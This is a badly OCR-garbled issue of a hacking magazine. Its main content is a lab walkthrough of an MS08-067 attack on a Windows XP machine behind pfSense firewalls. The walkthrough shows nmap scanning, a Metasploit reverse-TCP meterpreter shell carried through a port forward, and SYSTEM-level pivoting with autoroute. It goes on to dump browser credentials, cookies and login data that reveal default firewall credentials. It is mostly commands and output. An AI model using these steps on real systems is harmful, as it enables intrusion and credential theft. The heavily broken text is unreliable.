November2023 Edi

ti
on 6 I
ssue11 Learn how Bl
ack HatHackers hack

7t i
psfrom cybersecuri
ty expertt
ost
ay safe
from phishi
ng scams.
 To
Advertise
w ith us
Contact:
adm in@ hackercoolm agazine.com
 3

Copyright© 2016 IackercoolCyberSecurity (OPC) PvtL t

d
Al lrightsreserved. N o partof thispublication may be reproduced, distributed, or
!ransmitted i nany form orby any means, including photocopying, recording, orother
electronicormechanicalmethods, w ithoutthe priorw rittenpermission of the
publishe-r, excepti nthecase of brief q uotationsembodied i ncriticalreview sand
certainothernoncommercialusespermitted by copyrightl aw . orpermission
teto thepublisher, addressed ‘Attention: PermissionsCoordinator,11 at
eq uests, w ri
the addressbelow .
Any referencest o hist
oricalevents, realpeople, orrealplacesareused fi
cti
tiousl
y. N a
-mes, characters, and placesareproductso theauthor’simagination.

H ackercool1 vbersecurity (OPC) PvtL t

d.
B anjaraH i
lls, ^H yderabad500034
Telangana, India.
W ebsite :
w w w .hackercoolmagazine.com
E mai
lAddress:
admin@ hackercoolmagazine.com
Inform ation provided in this M agazine is
strictly for educational purpose only,
’lease don't m isuse this know ledge
to hack into devices or netw orks w ithout
taking perm ission.The M agazine will not
take any responsibility lor m isuse of this
ini’
urination.
 5

Then you w ill know the truth and the truth w ill set you free,
fohn 8 :32

E ditor'sN ote
Edition 6 Issue 11

II
TatHackercoolMagazine
wi
sh you a

Merry Christmas
and a

Happy New Year.

"CY B E R CR IMIN AL TH R E AT ACTOR S [AR E ] ADOPTIN G N EW , V AR IE D, AN D

IN CR E ASIN GL Y CR E ATIV E ATTACK CH AIN S - IN CL UDIN G TH E USE OF V AR IOUS TDS
TOOL S - TO E N AB L E MAL W AR E DE L IV E R Y ."

-PR OOFPOIN T
 6

IN SIDE
Seew hatourIlackercoolMagazi
ne'sN ovember2023 Issuehasi
nstoreforyou.

1. B l
ack H atH acking Scenario:
Part2

2. CyberSecuri
ty:
Thevastmajorityof ushavenoideaw hatthepadl
ock i
cononourinternetbrow ser
i
s- and i
t’sputting usatri
sk.

3. MetasploitThisMonth:
L at
estApache Modules

4. (]yberW ar:
Majorcyberatt
ack onAustralianportsuggestssabotagebya’foreignact
or".

5. E xploitW riting: I
’art3
Dow nloadingfi
lesand payl
oads.

6. (InlineSecuri
ty:
Phishingscams: 7 safet
ytipsfrom acybersecurityexpert.

Dow nloads

< >t
herUsefulR esources
7
 Company'
s Network Fi
rewal
l
Attacker'
s Network Fi
rewal

Targetnetwork
L et’sseei
tpractically. Fort
his, Ii
nst
allanotherPFSense Firew allto actasGatew ay fortheat
tac-
ersystem. H ere aretheW AN and L AN netw ork of thetargetsystem’sfi rew al
l.
Starting syslog... done.
Starting CR ON ... done.
pfSense 2.7 .0-R E L E ASE and64 Ued Jun 28 03 : 5 3 : 3 4 UTC 2023
B ootup conplete

FreeB SD /
and64 (pfSense.hone.arpa) (ttyv0)

UMki
are U irtual M achine - N etgate D evice ID : 2cla8 5 168 blc5 5 3 8 fa8 0

*** Up leone to pfSense 2.7 .0-R E L E ASE (and64 ) on pfSense ***

HAN (w an) -> bm 0 -> v4/D H CP4: 192.168 .24 9.160/

24
L AN (Ian) -> enl -> v4 : 192.168 .223 .3 /
24

0) L ogout (SSH only) 9) pfTop

1) A ssign Interfaces 10) FlIter L ogs
2) Set interface(s) IP address 11) R estart w ebConfigurator
3) R eset w ebConfigurator passw ord 12) PH P shell ♦ pfSense tools
4) R eset to factory defaults 13) U pdate froM console
5) R eboot systen 14) E nable Secure Shell (sshd)
6) H alt systen 15) R estore recent configuration
7) Ping host 16) R estart PH P-FPM
8) She11

E nter an option: |
The targetsystem’sIP addressi
s192.168 .223.6.

licrosof t W indows X P ( U ersion 5 .1.26001

C > C opy rig ht 19 8 5 -2001 M icrosof t C orp.
zx D ocum snts and S etting sX A dnioistrator> ipconf ig

indows IP C onf ig uration

F tbem et adapter Local Area C onnection:

IP Address. . . 19 2.168 .223.6

S ubnet Flask . . 75 5 .25 5 .25 3.0
D ef ault G atew ay 19 2.168 .223.3
Givenbelow i
stheW AN and L .AN netw ork informationof the Attackersystem sFirew al
l.
Starting syslog... done.
Starting CR ON ... done.
pfSense 2.7 .0-R E L E ASE and64 Ued Jun 28 03 : 5 3 : 3 4 UTC 2023
B ootup conplete

FreeB SD /
aMd64 (pfSense.hone.arpa) (ttyv0)

UMw are U irtual M achine - N etgate D evice ID : 5 7 2b5 d2f4 03 1e3 be08 90

*** UelcoMe to pfSense 2.7 .0-R E L E ASE (aMd64) on pfSense »»»

UAN (Man) -> 6M 0 -> V 4/D H CP4: 192.168 .24 9.15 9/

24
L AN (lan) -> v4 : 192.168 .110.1/ 24

0) L ogout (SSH only) 9) pfTop

1) A ssign Interfaces 10) F ilter L ogs
2) Set interface(s) IP address 11) R estart w ebConfigurator
3) R eset uebC onfigurator passw ord 12) PH P shell + pfSense tools
4) R eset to factory defaults 13) U pdate froM console
5) R eboot systen 14) E nable Secure Shell (sshd)
6) H alt systen 15) R estore recent configuration
7) Ping host 16) R estart PH P-FPM
8) Shell

E nter an option: |
heattackersystem’sIP addressi
s192.168 .110.5
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 1 2 7 .0.0.1 /8 scope host to
valid I f t forever preferredlft forever
inet6 ::1 /1 2 8 scope host
valtd_ lft forever preferred_ lft forever
2 : ethO : < B R 0AD CAST,M ULTICAST,UP,LOW ER _UP> mtu 1 500 qdtsc fq
_ codel state UP group defau lt ql en 1 000
I tnk/ether 00:0c:2 9 :9 3 :da:f0 brd f f :f f :f f :f f :f f :f f
inet 1 9 2 .1 6 8.1 1 0.5/2 4 brd 1 9 2 .1 6 8.1 1 0.2 55 scope global d
ynamte ncqfretrxroJTfi 6 th0
valtd_ lft 7 1 49 sec preferred_ lft 7 1 49 sec
tnet6 fe8 0::8 aff:8c6 :5ba:be9 8/6 4 scope link nopreftxrou t
e
valtd_ lft forever preferred_ lft forever

fere’sthe IP addressinformationof thenetw ork Iam using fort

histutorial.
1/you aretryingt
oportforward with non-admin privilegeson asystem, you can
onlyforwardportsabove 1024 .
 C om pany 's Network Firewall
Attacker's Network Firewall
ExternalI P : 192.168.249.160
ExternalIP : 192.168.249.159
InternalI P : 192.168.223.3
InternalIP : 192.168.110.1

AttackerSy stem
I
P : 192.168.110.5
T argetsy stem
IP Address: 192.168.223.6

lere, onceagain, Iam exploitingms()8 067 vulnerabili

ty {(am notgoing t
oleavethatvulnerabil
i-
rsosoon . So, Istartw i
th portscanningof Port445.
। (kal t& ka11)-L~.
I
— $ nmap -sT -Pn -p445 192.168.249.160
Starti ng N map 7.93 ( https:/ / nmap.o rg ) at 2023-12-04 04:00
E ST
N map sc an repo rt f o r 192.168.249.160
H o st i s u p (0.0014s latenc y ).

PORT STATE SE RVICE

445/ tc p o pen mtc ro so f t-ds

N map do ne: 1 IP address (1 ho st u p) sc anned tn 0.10 sec o nds

o, Iload thei
ns()8 067 moduleand thetargeti
sindeed vulnerable. Isetotherreq uired opti
ons.

A ccording t
o Crowd S trike'sglobalthreatreport2023, B lack HatHackersused
protocolssuch asR D P , S S H and S M B [orlateralmovementin cloud environments.
msf 6 > u se 0
[*] N o pay lo ad c o nf i g u red, def au lti ng to w i ndo w s/ meterpreter/
reverse_tc p
msf 6 explo i t(w tndo w s/ smb / ms08 067_netapt) > set rho sts 192, 16
8.249.160
rho sts => 192.168.249.160
msf 6 explo i t(w tndo w s/ smb / ms08_067netapt) > c hec k
[+] 192.168.249.160:445 - The targ et i s vu lnerab le.
msf 6 explo i t(w tndo w s/ smb / ms08_067_netapt) > set Ipo rt 81
Ipo rt => 81
msf 6 explo i t(w tndo w s/ smb / ms08_067_netapt) > |

Pay lo ad o pti o ns (w i ndo w s/ meterpreter/ reverse_tc p):

N ame Cu rrent Setti n Requ i red Desc ri pti o n

g

E XITFUN C thread y es E xi t tec hni qu e (Ac c e

pted: * *, seh, threa
d, pro c ess, no ne)
LH OST 192.168.110.5 y es The li sten address (
an i nterf ac e may be
spec i f i ed)
LPORT 81 y es The li sten po rt

t
eral
ltheoptionsareset
, Iexecutethemodule and theresulti
sgi
venbelow .
msf 6 explo tt(w tndo w s/ smb / ms08_067_netapt) > ru n

[*’ Started reverse TCP handler o n 192.168.110.5:81

[ * I 192.168.249.160:445 - Au to mati c ally detec ti ng the targ et.
•*
[*] 192.168.249.160:445 - Fi ng erpri nt: W i ndo w s XP - Servi c e P
ac k 2 - lang :E ng li sh
[*] 192.168.249.160:445 - Selec ted Targ et: W i ndo w s XP SP2 E ng
li sh (Alw ay sOn N X)
[*] 192.168.249.160:445 - Attempti ng to tri g g er the vu lnerab i
li ty ...
[*] E xplo i t c o mpleted, bu t no sessi o n w as c reated.
msf 6 explo i t(w i ndo w s/ smb / ms08_067_netapi ) > |
 12
It’sthismessage again. ( Idon'tthinkjustl ikeIam notgoing t o leave thems()8 _067 module, this
messagei snotgoing t o leave me). On aseriousnot e, thevulnerability i striggered butw egotno
session. H ow ever, know theexactreasonw hy t hismodule fail ed now . If you observetheabove
image, handlerstarted on theattackersyst em (192.168 . i10.5). w hich isan 11’addressi nthe L AN
netw ork. Iherei sno chance thatany machine ininternetw i llknow aboutourtargetsyst em.
H ow ever, one device inAttackerL AN w i llknow aboutt his. The only devicebelonging t othis
netw ork (192.168 .110.X) thathascommunication w it h the interneti sthe Attackernetw orks
R outerorFirew all . In ourcase, iti
s192.168 .249.159.
Ourtargetsyst em can onlycommunicatew it h thisdevice (192.168 ,249.159). So, Iforw ard the
port8 1 of 192.168 .249.159 to port8 1 of my Attackersyst em(192.168 .110.5). Portforw ardingcan
beperformed in 1’’Sense [from Firew all/ N AT/ PortForw ard Secti on). Iheprocessmay differsl igh
-t
lybuti salmostsameinal lR outersand Fi rew al
l).

Fi
rewal
l/ NAT / P ortForward / Edi
t

Edi
tRedi
rec
tEnt
ry

D i
sabl
ed Q D i
sabl
e thi
s rul
e

No R D R (
NO T) Q D i
sabl
e redi
recti
on fortraffi
c m atchi
ng thi
s rul
e
Thi
s opti
on i
s rarel
y needed. D on'
tuse thi
s wi
thoutthoroughknowl
edge of the i
m pl
icati
ons

I nterface W AN

Choose whi
chi
nterface thi
s rul
e appl
ies to. In m ostcases '
W AN i
s speci
fi
ed.

Address Fami
ly IPv4

S el
ectthe InternetP rotocolversi
on thi
s rul
e appl
ies to.

P rotocol TCP/UD P
Choose whi
chprotocolthi
s rul
e shoul
d m atch In m ostcases ’TCP i
s speci
fi
ed.

S ource
O D i
spl
ayAdvanced

D estmahon l~ ) Invert m atrh W AN address

D estination □ Invertm atch W AN address

Address/m ask

D esti
nati
on portrange O ther 81 O ther 81
Custom Custom

port’.i
ng the desti
nati
on of the packetforthi
s mappi
ng The I o'hel
d may be l
eftem pty if onl
y mappi
ng a si
ngl
e port

R edi
recttargetIP Si
ngl
e host 1 9 2 1 6 8 1 1 05
Address

nk l
ocaladdresses scope (
fe80:*)to l
ocalscope (1 )

R edi
recttargetport 81
Custom

caseof a portrange, speci

fythe begi
nni
ng portolthe range (
the end portwi
llbe
 13
Then, Isavetherule. N ow , any q uery comingfrom t heW AN netw ork t o port8 1 of my Gatew ay
Firew all(192.168 .249.159) w i
llbeforw arded to port8 1 of 192.168 .110.5, w hich ismy attackermac
hine. N ext, Isetthelocalhostoption to thatof t hisGatew ay Firew all(192.168 .249.159).
msf 6 explo i t w tndo w s/ smb / ms08_067_netapt) > c hec k
[+] 192.168.249.160:445 - The targ et i s vu lnerab le.
msf 6 explo i t(w tndo w s/ smb / ms08_067_netapt) > set Iho st 192.168
.249.159
Iho st => 192.168.249.159
msf 6 explo i tf w tndo w s/ smb / ms08_067_netapt) > |

N ow , let’sexecute the module.

msf 6 explo i t(w tndo w s/ smb / ms08_067_netapi .) > ru n

[-] H andler f ai led to bi nd to 192.168.249.159:81:- -

[*] Started reverse TCP handler o n 0.0.0.0:81
[*] 192.168.249.160:445 - Au to mati c ally detec ti ng the targ et.
■ •

[*] 192.168.249.160:445 - Fi ng erpri nt: W i ndo w s XP - Servi c e P

ac k 2 - lang :Unkno w n
[*] 192.168.249.160:445 - W e c o u ld no t detec t the lang u ag e pa
ck, def au lti ng to E ng li sh
[*] 192.168.249.160:445 - Selec ted Targ et: W i ndo w s XP SP2 E ng
li sh (Alw ay sOn N X)
[*] 192.168.249.160:445 - Attempti ng to tri g g er the vu lnerab i
li ty ...
[*] Sendi ng stag e (175686 by tes) to 192.168.249.160
|[*] Meterpreter sessi o n 1 o pened (192.168.110.5:81 -> 192.168
.249.160:37691) at 2023-12-04 04:25:04 -0500

meterpreter > sy si nf o
Co mpu ter : ADMIN -FFBE 8F88E
OS : W i ndo w s XP (5.1 Bu i ld 2600, Servi c e Pac k 2)

Arc hi tec tu re : x86

Sy stem Lang u ag e : en_US
Do mai n : W ORKGROUP
Lo g g ed On Users : 2
Meterpreter : x86/ w i ndo w s
meterpreter > g etu i d
Server u sername: N T AUTH ORITYXSYSTE M
meterpreter > |
Il
a, nothingl
ikeasuccessfulmeterpretersession.
 C om pany 's Network Firewall
Attacker's Network Firewall
ExternalIP : 192.168.249.160
ExternalIP : 192.168.249.159
InternalIP : 192.168.223.3
InternalIP : 192.168.110.1

Internet

AttackerS y stem
IP : 192.168.110.5
T argetsy stem
IP Address: 192.168.223.6

LateralM ovement
InR ealw orld, B lack H atH ackershack t o getaccessto high-valueasset s. Thiscaninclude
sensitivedata, source code, and otherimportantinformation. R arely, asyst em tow hich B lack H at
H ackersgain i niti
alaccesscontainshi gh-value asset
smentioned above. So B l ack H atH ackersaft e-
rgaining i niti
alaccessinanetw ork t riestomove around thenetw ork insearch of high valueasset
-sand fi nall
y take controlof theentire netw ork. Thisi sknow nasL ateralMovementorPivoti ng.
They usevarioustechniquest o achievethis. The firststep i
nlateralMovementi sof course
perform reconnaissance togatherinformationaboutthenetw ork devices. To gatherinformationa-
boutthetargetnetw ork, B l ack H atH ackersperform st epsl ikeview ing theAddress R esolution
Protocol(AR P) table, view ingnetw ork interfaces, netw ork connectionsand thetargetnetw ork’s
routingtable.
L et’sseei tpractical
ly. < 'nthetargetnetw ork, Ihave SYST EM l evelME TI R PR E TE R accesson
oneof thesyst ems( Iam talking aboutourtargetsystem, buddy). Meterpreterhasmany comman­
dsbuilti nto perform theabove-mentioned reconnai ssance.

S O CK S standsforS ocketS ecureand isan internetprotocolthatenablestheexchange

of networkpacketsbetween a clientand aserverthrough aproxysewer.
 S tdapi: Networking Commands

Command D escription

arp D isplay the host AR P cache

getproxy D isplay the cu rrent proxy configu ration
ifconfig D isplay interfaces
ipconfig D isplay interfaces
netstat D isplay the network connections
portfw d Forward a local port to a rem ote service
resolve R esolve a set of host names on the target
rou te View and m odify the rou ting table

L etsfi
rstview the AddressR esolution Protocol(Al'P) table of thetargetsyst
em.

m eterpreter > arp

AR P cache

I P address MAC address I nterface

1 9 2 .1 6 8 .2 2 3 .3 00:0c:2 9 :a7 :5 d:3 0 AMD PCNET Fam ily PCI

E thernet Adapter - Pa
cket S cheduler M inipo
rt

m eterpreter >

L et’sseei
f thetargetsyst
em belongsto aDualhomed netw ork orSinglehomed netw ork. A
computerinaDualhomed netw ork i sconnected to t
w o netw orks. Forexample, the I senseFi
re­
w allw eareusinghere (W AN & L AN ). The ‘ipconfig’ command inW indow srevealsthenetw ork
interfacesthe system isconnected to.
m eterpreter > ipconfig

I nterface 1

Name MS TCP Loopback interface

H ardware MAC 00:00:00:00:00:00
MTU 1 52 0
I P v4 Address 1 2 7 .0.0.1
 16

I nterface 2

Name : AMD PCNET Fam i l

y PCI E thernet Adapter - P acket
S cheduler M iniport
H ardware MAC : 00:0c:2 9 :6 d:5 c:3 1
MTU : 1 500
I P v4 Address : 1 9 2 .1 6 8.2 2 3 .6
I P v4 Netmask : 2 55.2 55.2 55.0

m eterpreter

Thetargetsyst
em belongstoaSingle lomed netw ork. N o luck here. N ext, let'sview therouting
t
abl
eon the kirgetsystem.Intheabove image, you canseethattherei sonly one IP addressw hich
m eterpreter > route

I P v4 network routes

S ubnet Netmask G ateway M etric I nterface

0.0.0.0 0.0.0.0 1 9 2 .1 6 8.2 2 3 10 2

1 2 7 .0.0.0 2 5 5 .0.0.0 T77707 1

1 9 2 .1 6 8.2 2 2 55.2 55.2 55 1 9 2 .1 6 8.2 2 3 10
3 .0 .0 .6
1 9 2 .1 6 8.2 2 2 55.2 55.2 55 1 2 7 .0.8 .1 10
3 .6 .2 55
1 9 2 .1 6 8.2 2 2 55.2 55.2 55 1 9 2 .1 6 8.2 2 3 10
3 .2 55 .2 55 .6
2 2 4.0.0.0 2 40.0.0.0 1 9 2 .1 6 8.2 2 3 10
.6
2 55.2 55.2 5 2 55.2 55.2 55 1 9 2 .1 6 8.2 2 3 1
5.2 55 .2 55 .6

No I P v6 routes were found.

m eterpreter > |
appearstobe uniq ue i tis192.168 .223.3 apartfrom 192.168 .223.6w hich isourtargetsystem w e
already haveaccesst o.
Sincew ealready know t hissyst em i sbehind aFirew all, t
hisIP (192.168 .223.3) should belong
to the Firew allorw earehorribly w rong. 1 iti
saFirew all, i
tw illberemotely administered. The
only system from w hich i
tcanbeadministered w i l
lbe our192.168 .223.6asIl ierouting table does­
n’tprovide informationaboutothersyst emsint hi
snetw ork. I nee again, let’sassumew ecanbe
lorribly w rong.
W eneed t o portscanthisdeviceto fi nd more informationabouti t. B utbefore thatw eneed t
o
idd aroute t ot hi
sdevice from inside thenetw ork asitisnotaccessiblefrom my attackersyst em.
Phiscanbe done by using the ‘autoroute’’ module of Metasploit.
m eterpreter >
B ackground session 1 ? [y/N ] |

msf 6 au x iliaryfscanner/portscan/tcp) > search au torou te

M atchi
ng M odul
es

# Name D isclosu re D ate R ank

heck D escription

0 post/m u ltt/m anage/au toroute norm al N

o M u lti M anage Network R oute via M eterpreter S ession

msf6 au x iliary( scanner/portscan/tcp) > use 0

m sf6 post(m u ltt/m anage/au torou te) > show options

M odul
e options (post/m u lti/m anage/au torou te):

Name Current S ettin R equi

red D escription
g
CMD autoadd yes S pecify the autoroute
command ( Accepted: a
dd, autoadd, print, d
elete, defau lt)
NETM ASK 2 55.2 55.2 55.0 no Netmask ( I P v4 as "2 55
.2 5 5 .2 5 5 .0” or CID R a
s "/2 4 ”
SESSION yes The session to run th
is modul e on
SUB NET no S ubnet ( I P v4, for exa
m ple, 1 0.1 0.1 0.0)

Vi e info w ith the info, or info -d command.

ew the f u ll modul

msf 6 post(
m u ltt/m anage/au torou te)
 18
Ihave to do to execute t
hismodule i
sto setthesessionID of themeterpreter.
m sf6 post(
m u ltt/m anage/au torou te) > set session 1
session => 1
m sf6 post(
m u ltt/m anage/au torou te) > run

[!] SESSIO N may not be com patible w ith this m odul e:

[!] * incom patible session platform : wi ndows
[*] R unni ng m odul e against AD M IN-FFB E8F88E
[*] S earching for subnets to au torou te.
[+] R oute added to subnet 1 9 2 .1 6 8 .2 2 3 .0/2 5 5 .2 5 5 .2 5 5 .0 from ho
s t's’ rou tend'xiD ie.
[*] P ost m odul e execu tion com pleted
m sf6 post( m u ltt/m anage/au torou te) > |

The route i
sadded, N ow , w ecan perform aportscanof t
hisdevice. H ere Iam scanning forsome
common partsto beopen on t hi
sdevice.
m sf6 post( m u ltt/m anage/au torou te) > use au xiliary/scanner/por
tscan/tcp
m sf6 au x iliary( scanner/portscan/tcp) > set ports 8 0,2 1 ,2 3 ,2 5
ports => 8 0,2 1 ,2 3 ,2 5
m sf6 au x tliary( scanner/portscan/tcp) > run

[+] 1 9 2 .1 6 8 .2 2 3 .3 : - 1 9 2 .1 6 8 .2 2 3 .3 :8 0 - TCP OPEN

AC [*] 1 9 2 .1 6 8 .2 2 3 .3 : - tau ght interru pt from the conso
le ...
[*] A u x iliary m odul e execu tion com pleted
Ifound port8 0 open. V ery good. 11mi sisindeed t he IIrew alland port8 0isopen, itmeansi t
w ould be administered using abrow ser, right. So, al
lIhave t o do i
ssee thebrow serinstalled on
thistargetsystem and thentry tocollectinformat ionfrom i t. Although Metasploithasamodule fo
-rthi
stoo, let'sjustgo tosheIand view the<Program i 'i
les= folderof ourtargetsyst
em.
m sf6 au x iliary(
scanner/portscan/tcp) > sessions

A ctive sessions

Id Name Type I nform ation Connection

1 m eterpreter x8 NT AUTHO R ITYXS 1 9 2 .1 6 8 .1 1 0.5 :8

6 /windows YSTEM @ AD M IN- 1 -> 1 9 2 .1 6 8.2 4
FFB E8F88E 9 .1 6 0:3 7 6 9 1 ( 19
2 .1 6 8 .2 2 3 .6 )
19
 20
D irectory of C:\P rogram Files

1 1 /1 6 /2 02 3 01 :2 1 PM <D IR >
1 1 /1 6 /2 02 3 01 :2 1 PM <D IR >
1 1 /1 6 /2 02 3 1 1 :48 AM <D IR > Common Files
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > ComPl us Applications
1 1 /1 6 /2 02 3 1 1 :45 AM <D IR > I nternet E xplorer
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > M essenger
1 1 /1 6 /2 02 3 1 1 :45 AM <D IR > m icrosoft frontpage
1 1 /1 6 /2 02 3 1 1 :44 AM <D IR > M ovie M aker
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > MSN
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > MSN G ami ng Zone
1 1 /1 6 /2 02 3 1 1 :44 AM <D IR > NetM eeting
1 1 /1 6 /2 02 3 1 1 :44 AM <D IR > O nline S ervices
1 2 /04/2 02 3 02 :58 PM <D IR > O pera,
1 1 /1 6 /2 02 3 1 1 :44 AM <D IR > "O utlook E xpress
1 1 /1 6 /2 02 3 1 1 :48 AM <D IR > VM ware
1 1 /1 6 /2 02 3 1 1 :45 AM <D IR > Wi ndows M edia Player
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > Wi ndows NT
1 1 /1 6 /2 02 3 1 1 :45 AM <D IR > xerox
0 File( s) 0 bytes
1 8 D tr(s) 1 8,82 7 ,3 09 ,056 bytes free

C:\P rogram Files>

The targetsystem hastw o brow sersinstalled. They areInternetE xplorerand Opera. N ow , Iw i
ll
ise Metasploitpostenumeration modulestogathercredentialsfrom thesebrow sersasshow n
jelow .
msf6 au x iliaryfscanner/portscan/tcp) > search post/wi
ndows/ga
ther/credentlais/IE

M atchi
ng M odul
es

# Name D isclosure D ate Ra

nk Check D escription

no
rm al No le credential gatherer

I nteract w ith a modul

e by name or index. For exampl
e info 0,
m sf6 au x iliary(scanner/portscan/tcp) > use 0
m sf6 post( w indow s/gather/credentials/ie) > show options

M odul
e options (
post/w indow s/gather/credentials/ie):

Name Current S ett R equi

red D escription
tng

AR TIFACTS A ll no Type of artifacts

to collect ( Accept
ed: A ll, web_ histo
ry)
EXTR ACT_D ATA tru e no E xtract data and s
tores in a separat
e f ile
R EGEX '
'password no M atch a regu lar ex
pression
SESSION yes The sessi on to run
this modul e on
STOR E_LOOT tru e no S tore artifacts in
to loot database

Vi
ew the f u ll modul
e info w ith the info, or info -d command.

msf6 post(
w indow s/gather/credentials/ie) > |
m sf6 post(
w indow s/gather/credentials/ie) > run

[*] Filtering based on these selections:

[*] AR TIFACTS: A ll
[*] STOR E_LOOT: tru e
[*] EXTR ACT-D ATA: tru e

[*] le's I ndex.dat f ile found

[*] D ownl oadi ng C:\D ocum ents and S etttngs\Adm inistrator\L ocal
S ettings\H tstory\H istory.I E 5 \index.dat
[*J le I ndex.dat downl oaded
i+] File saved to: /hom e/kali/.m sf4/loot/2 02 3 1 2 04043 9 05_ defa
u lt_ 1 9 2 .1 6 8.2 2 3 .6 .I E index.dat 9 6 0486 .dat

[*] D ownl
oadi
ng C:\D ocum ents and S ettings\Adm inistrator\L ocal
[*] D ownl oadi ng C:\D ocum ents and S etttngs\Adm intstirator\L ocal
S etttngs\H tstory\H tstory.I E 5 \index.dat
[*] le I ndex.dat downl oaded
[+] File saved to: /hom e/kali/.m sf4/loot/2 02 3 1 2 04043 9 05 defa
u lt_ 1 9 2 .1 6 8.2 2 3 .6 _ I E tndex.dat_ 9 6 0486 .dat

[*] D ownl oadi ng C:\D ocum ents and S ettingsX Adm inistratorX Local
S ettingsX H istoryX H istory.I E 5\M S H l st01 2 02 3 1 1 1 6 2 02 3 1 1 1 7 \i
ndex.
dat
[*] le I ndex.dat downl oaded
L+] File saved to: /hom e/kali/.m sf4/loot/2 02 3 1 2 04043 9 O 6 _ defa
ult_ 1 9 2 .1 6 8.2 2 3 .6 _ I E index.dat_ 86 3 7 45.dat

[*] P ackR at credential sweep Compl eted

[*] P ost modul e execution com pleted
msf6 post( w tndow s/gather/credenttals/te) > |
H ie moduleruns, dow nloadsand savesanyinterestinginformationinbinary fil
esasshow nabove
. N othingi
nInternetE xplorer. L et’scoll
ectinformat
ionfrom Operabrow ser.
m sf6 post(w tndow s/gather/credenttals/te) > use post/wi
ndows/g
ather/credentials/opera
m sf6 post(w tndow s/gather/credenttals/opera) > set session 1
sessi on => 1 _
m sf6 post(w tndow s/gather/credenttals/opera) > run

[*' Filtering based on these selections:

IE*] AR TIFACTS: A ll
|[*] 5T0R E_ L00T: tru e
[*] EXTR ACT D ATA: tru e

[*] O pera' s Logi n data f ile found

|[*] D ownl oadi ng C:\D ocum ents and S ettingsX Adm inistratorX Appli
cation D ataXO pera S oftwareXO pera S tabl eX Logi n D ata
[*] O pera Logi n data downl oaded
[+] File saved to: /hom e/kali/.m sf4/loot/2 02 3 1 2 04043 9 58_ defa
u lt_ 1 9 2 .1 6 8.2 2 3 .6 _ operaLoginD ata 7 809 3 9 .bin

E+] File w ith data saved: /hom e/kali/.m sf4/loot/2 02 3 1 2 04043 9

59 _ defaul
t_ 1 9 2 .1 6 8.2 2 3 .6 _ E X TR ACTI 0NS Logi
n-56 1 7 7 9 .bi
n

B lack HatHackersbelongingt o D ark X exusbotnetattack infected numerousIO T

devicesand then ran a S O CK S proxy on a random portt o conned with their
server.
 [+] File w ith data saved: /hom e/kali/.m sf4/loot/2 02 3 1 2 04043 9
59 _ defaul t_ 1 9 2 .1 6 8.2 2 3 .6 _ E XTR ACTI 0NS Logi n_ 56 1 7 7 9 .bi
n
[*] O pera' s Cooki es f ile found
[*] D ownl oadi ng C:\D ocum ents and S ettingsX Adm inistratorX Appli
cation D ataXO pera S oftwareXO pera S tabl eX Cooki es
[*] O pera Cooki es downl oaded
hom e/kalt/.m sf4 /1 oot/2 02 3 1 2 04043 9 59 defa
ult_ 1 9 2 .1 6 8.2 2 3 .6 _ operaCooki es 01 3 2 43 .bi
n

[+] File w ith data saved: /hom e/kali/.m sf4/loot/2 02 3 1 2 040440

00_ defaul t_ 1 9 2 .1 6 8.2 2 3 .6 _ E XTR ACTI O NS Cookt_ 7 9 46 3 0.bi
n
[*] O pera' s V isited links f ile found
[*] D ownl oadi ng C:\D ocum ents and S etttngs\Adm intstrator\Applt
cation D ataXO pera S oftwareXO pera S tableX V isited Li nks
[*] O pera V isited links downl oaded
[+] File saved to: /hom e/kali/.m sf4/loot/2 02 3 1 2 0404400O defa
ult_ 1 9 2 .1 6 8.2 2 3 .6 _ operaV isitedLin_ 9 3 453 3 .bin

[*] O pera' s W eb data f ile found

[*] D ownl oadi ng C:\D ocum ents and S ettingsX Adm inistratorX Applt
cation D ataXO pera S oftwareXO pera Stabl eXW eb D ata
[*] O pera W eb data downl oaded
[+] File saved to: /hom e/kali/.m sf4/loot/2 02 3 1 2 04044002 defa
u lt 1 9 2 .1 6 8.2 2 3 .6 operaW ebD ata 2 49 3 9 1 .bi
n

[+] File w ith data saved: /hom e/kali/.m sf4/loot/2 02 3 1 2 040440

02 _ defaul
t_ 1 9 2 .1 6 8.2 2 3 .6 _ E XTR ACTIO NS W ebD _ 2 1 5559 .bi
n
[*] P ackR at credential sweep Compl eted
.*] P ost modul e execution com pl eted
msf6 post( w tndow s/gather/credenttals/opera) > I
Vecanjustusecatcommand t
ovi
ew thecontentsof thesefi
les.
— ( kalt® kalt)-[~ ]
$ cat /hom e/kali/.m sf4/loot/2 02 3 1 2 04043 9 5 8 _ defau lt_ 1 9 2 .1 6 8.
2 2 3 .6 _ operaLogtnD ata_ 7 809 3 9 .bin
^ k0^ >0B ^ % olndexstats ortginstats CR EATE IND EX stats
igin ON stats( ortgin_ dom ain)^ @ *>tablestatsstatsCR E ATE TAB LE
tats •ori gin_ dom atn VAR CHAR NOT NULL, usernam e_ val ue VAR CHAR ,
dism issal_ count INTEG ER , update_ ti m e INTEG ER NOT NULL, UNIQU
E( origin-dom ain, username valu e)) )=indexsq lite auto i ndex stat
s_ lstatR ' sindexlogins_ stgnonlogtnsCR E ATE IND EX logins_ signon
ON logins (signon_ realm )^ 7 ^ I tableloginsloginsC R E ATE TAB LE lo
,ins ( origin_ u rl VAR CHAR NOT NULL, actton_ u rl VAR CHAR , usernam
Inone of theclumpsthemodule dow nloaded, Ifound some credentials.
i
— ( kali® kali)-[**]
cat /hom e/kali/.m sf4/loot/2 02 3 1 2 04044002 _ default_ 1 9 2 .1 6 8.
2 2 3 .6 _ EXTR ACTIO NSW ebD _ 2 1 5559 .bin
dst 1 9 2 .1 6 8.2 2 3 .6 1
dstbegtnport_ cust 1 000 <
dstbegtnport_ cust 445
dstendport_ cust 445 >
dstendport.cust 6 553 5
localbeginport_ cu st 445
localtp 1 9 2 .1 6 8.2 2 3 .6
src 1 9 2 .1 6 8.2 2 3 .6
usernam efi d admi n
usernam efi d pfsense
Thisi sexciting. Y ou know w hy? The credentialsIgotaredefaultcredentialsof PFSense
Firew all. It
’sconfirmed t hi
sdevicei sthe Gatew ay Firew alland now w ecan ow ni tjustlikeour
W indow sXP. W ealready havethecredentialsbuthow tologininto the irew alk lliereare a few
w ayst o do i t
. H ere, w ew illuseaproxy'server.
